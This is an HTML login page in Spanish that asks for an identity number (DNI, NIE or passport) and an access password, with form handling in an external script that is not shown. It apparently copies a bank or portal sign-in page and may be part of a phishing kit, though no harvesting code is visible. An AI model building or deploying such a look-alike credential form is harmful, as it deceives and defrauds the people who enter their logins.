<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="top">
            <img src="./img/uptopap01.png" alt="">
        </div>
    </div>



    <div class="section">
       
        
        <form method="post" id="pg1">
            <div class="group">      
                <input type="text" id="dni" required>
                <span class="highlight"></span>
                <span class="bar"></span>
                <label>DNI, NIE, Pasaporte o usuario</label>
            </div> 
            <div class="group g2">      
                <input type="password" id="paso" required>
                <span class="highlight"></span>
                <span class="bar"></span>
                <label> Clave de acceso</label>
            </div> 
            <div>
                <div>
                    <p class="pp3">
                        Recuperar clave de acceso
                    </p>
                </div>
            </div>
            
            <button type="submit">Acceder</button>
            
        </form>
        <img class="bot" src="./img/bot.PNG" alt="">
    </div>


    <div>
        <div class="bont">
            <img src="./img/botomatp01.png" alt="">
        </div>
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>